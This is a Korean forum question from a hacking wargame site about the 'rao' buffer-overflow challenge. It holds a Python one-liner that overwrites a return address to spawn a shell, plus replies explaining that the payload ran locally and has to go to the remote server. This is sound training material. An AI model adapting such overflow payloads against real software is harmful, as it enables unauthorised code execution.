완료됨
exploit 질문

(python3 -c "import sys;sys.stdout.buffer.write(b'A'*0x30 + b'B'*0x8 + b'\xdd\x11\x40\x00\x00\x00\x00\x00')";cat) | ./rao
입력 이후에
id
uid가 rao가 아닌 제 uid로 나오는데 뭐가 문제일까요?

#시스템해킹 #공격기법 #buffer_overflow
작성자 정보
더 깊이 있는 답변이 필요할 때
드림핵 팀과 멘토에게 직접 문의해 보세요!
답변 2
wyv3rn
무플 방지 위원회장

마찬가집니다. 서버에서는 rao의 계정으로 실행되고 있을거라 쉘 획득시 id가 rao가 될테고
지금 하신건 로컬에서 쉘을 획득해서 그런거고요.

2023.07.23. 09:26
Rosieblue
워게임 고인물

왜냐하면 파이프(|) 앞에 거를 뒤 ./rao로 보내시고 있는데, ./rao는 질문자님의 리눅스에 있는 바이너리이기 때문에 해당 바이너리에서 쉘따고 id를 실행하면 질문자님의 환경에서 id를 실행하는게 되는거죠!

파이프 왼쪽꺼를 서버로 보내야해요

2023.07.23. 12:31